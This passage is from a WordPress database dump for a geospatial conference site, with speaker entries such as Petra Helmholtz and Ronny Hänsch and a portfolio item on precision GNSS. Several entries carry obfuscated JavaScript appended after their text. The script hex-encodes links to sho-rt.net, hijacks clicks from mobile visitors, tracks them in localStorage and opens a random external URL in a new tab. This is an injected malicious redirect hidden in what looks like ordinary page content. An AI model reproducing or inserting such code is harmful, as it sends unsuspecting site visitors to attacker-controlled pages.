_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','publish','closed','closed','','precision-gnss-technology-advances-and-applications-for-navigation-and-mapping','','','2023-02-05 14:50:25','2023-02-05 14:50:25','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3452',0,'dt_portfolio','',0),
(3453,1,'2022-12-16 13:41:24','2022-12-16 13:41:24','','w26m1','','inherit','open','closed','','w26m1','','','2022-12-16 13:41:24','2022-12-16 13:41:24','',3452,'https://gsw2023.com/wp-content/uploads/2022/12/w26m1.jpg',0,'attachment','image/jpeg',0),
(3454,1,'2022-12-16 13:42:15','2022-12-16 13:42:15','','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 13:42:15','2022-12-16 13:42:15','',3452,'https://gsw2023.com/?p=3454',0,'revision','',0),
(3455,1,'2022-12-16 13:44:57','2022-12-16 13:44:57','<!-- wp:paragraph -->\n<p>Curtin University, Australia</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Petra Helmholtz','','publish','closed','closed','','petra-helmholtz','','','2022-12-16 13:53:09','2022-12-16 13:53:09','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3455',0,'dt_team','',0),
(3456,1,'2022-12-16 13:46:51','2022-12-16 13:46:51','<!-- wp:paragraph -->\n<p>DLR Germany</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Ronny Hänsch','','publish','closed','closed','','ronny-hansch','','','2022-12-16 13:46:54','2022-12-16 13:46:54','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3456',0,'dt_team','',0),
(3457,1,'2022-12-16 13:46:03','2022-12-16 13:46:03','','w252','','inherit','open','closed','','w252','','','2022-12-16 13:46:03','2022-12-16 13:46:03','',3456,'https://gsw2023.com/wp-content/uploads/2022/12/w252.jpg',0,'attachment','image/jpeg',0),
(3458,1,'2022-12-16 13:48:20','2022-12-16 13:48:20','<!-- wp:paragraph -->\n<p>University of Calgary, Canada</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 